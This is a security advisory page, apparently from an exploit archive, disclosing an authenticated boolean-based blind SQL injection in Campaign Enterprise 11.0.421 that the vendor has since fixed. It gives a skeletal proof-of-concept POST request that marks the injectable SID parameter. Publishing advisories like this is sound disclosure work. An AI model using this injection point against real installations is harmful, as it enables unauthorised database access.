Campaign Enterprise 11.0.421 SQL Injection

2012.02.02
Credit: Craig Freyman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################################################################################## #Exploit Title: Campaign Enterprise 11.0.421 SQLi Vulnerability #Author: Craig Freyman (@cd1zz) #Date Discovered: 12/12/2011 #Vendor Notified: 1/19/2012 #Vendor Fixed: 1/30/2012 (Version 11.0.512) #Description: The SID parameter in a POST is vulnerable to a boolean based blind SQLi. #You must be authenticated to access this parameter. The default database for Campaign #Enterprise is MS Access. ######################################################################################## #Proof of Concept # POST /Command HTTP/1.1 SID=303[SQLi]&ACTION=ADMINISTRATION&ALTCOMMAND=REFRESH&CAMPAIGNID=3&SortBy=CampaignName&LISTVALUE=&CampaignName=&CopyCampaignName=&PageNumber=Page+1&SearchText=


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top